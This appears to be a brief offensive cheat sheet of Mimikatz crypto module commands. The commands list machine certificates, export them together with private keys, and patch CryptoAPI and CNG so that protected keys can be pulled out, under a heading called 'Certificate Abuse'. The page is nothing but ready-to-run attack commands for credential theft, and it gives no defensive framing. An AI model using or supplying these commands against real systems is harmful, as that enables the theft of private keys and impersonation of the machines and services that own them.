Skip to content

๐Ÿ“œ Certificate Management

๐Ÿ“ค Certificate Export

# List certificates
crypto::certificates /systemstore:local_machine

# Export with private keys
crypto::certificates /systemstore:local_machine /export

๐Ÿ’€ Certificate Abuse

# Extract machine certificates
crypto::capi
crypto::cng

# Patch CryptoAPI
crypto::capi /patch
crypto::cng /patch